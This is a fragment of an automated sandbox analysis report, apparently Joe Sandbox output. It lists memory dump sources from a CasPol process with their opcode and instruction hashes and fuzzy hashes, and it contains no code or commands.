                                                                                            • Snapshot File: hcaresult_5_2_63d000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
                                                                                            • Instruction ID: c60339221b03339d16a577fb704086bc68900040658057e479a7b9cdca4a9827
                                                                                            • Opcode Fuzzy Hash: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
                                                                                            • Instruction Fuzzy Hash: 1A21A276504280DFCF16CF10D9C4B56BF72FB98314F24C6A9D9490B256C33AD426DB91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2219634143.000000000063D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_63d000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                            • Instruction ID: e6a18a90bcd48f3de67cd7000afdfbd4be6d0243bd90b356cd73c1dc6fc2fb1b
                                                                                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                            • Instruction Fuzzy Hash: BC11E676504284DFCB06CF10E9C4B56BF72FB99314F24C6A9D9490B356C336D85ACBA2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2219681027.000000000064D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0064D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_64d000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                            • Instruction ID: cd418bb59890e182c9521465f3044cd30030a5975c4c83657c163c3f93688af7
                                                                                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                            • Instruction Fuzzy Hash: 2211BB75904280DFCB02CF14D5C4B15BBA2FB84314F24C6AAD9494B756C33AE80ACBA2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2219681027.000000000064D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0064D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_64d000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                                                                            • Instruction ID: 6b17d65195f635d4de12a00855bf3c5c458ee47e638ed13e06be6bdb7d2fd502
                                                                                            • Opcode Fuzzy Hash: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                                                                            • Instruction Fuzzy Hash: 5311E275904280CFDB02CF10D5C4B56FF62FB84324F24C6AAD9490B756C37AD90ACB62